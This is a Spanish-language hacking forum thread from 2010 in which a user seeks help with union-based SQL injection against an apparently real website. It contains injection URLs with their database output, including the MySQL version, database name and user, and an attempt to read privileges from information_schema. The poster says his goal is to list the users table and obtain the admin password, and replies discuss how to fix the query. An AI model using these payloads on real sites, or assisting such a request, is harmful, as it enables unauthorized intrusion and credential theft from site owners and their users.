Casi es Mio SQL inyection

Iniciado por nuevaorden, 22 Marzo 2010, 23:22 PM

0 Miembros y 2 Visitantes están viendo este tema.

nuevaorden

Vale en esta web tengo:

http://www.webvulnerable.net/productos.php?id=-1+union+all+select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--

Ya que hay 36-

La versioón del Mysql es : 4.1.22
La base de Datos: qar139
Usuario " Creo" : qar139@%



El tema es , intento sacar mas info como por ejemplo la lista de privilegios:

http://www.webvulnerable.net/productos.php?id=-1+union+all+select%201,concat(grantee,privilege_type,is_grantable),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+information_schema.user_privileges--

pero me da este error:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/vhost/webvulnerable.net/home/html/productos.php  on line 53

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhost/webvulnerable.net/home/html/productos.php on line 75


puede ser a la version del Mysql???  si es el caso alguien sabe como hacer la quiery correcta???

Gracias

Shell Root

Que raro, cuando estuvé en las iSQL solo queria sacar al user y pass del admin. Ahora no sé que es lo que estas haciendo vos... =F
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

nuevaorden

jejejejeje, quiero ver las columnas de la base de datos, en ella hay una de usuarios supongo y no la puedo listar.... gracias

nuevaorden

para poder ver el password...

Shell Root

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

nuevaorden

lo siento los newbabys como yo aprendemos de maestros como vosotros, buscando .... gracias


Baaaw Oic

Pues resulta que la consulta esta mal planteada, es por eso que te retorna ese error. La query retorna falso y por ende mysql_num_rows y mysql_fetch_array muestra ese error. (valga la redundancia xD)

Shell Root

Haz mirado tutorial de iSQL?
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.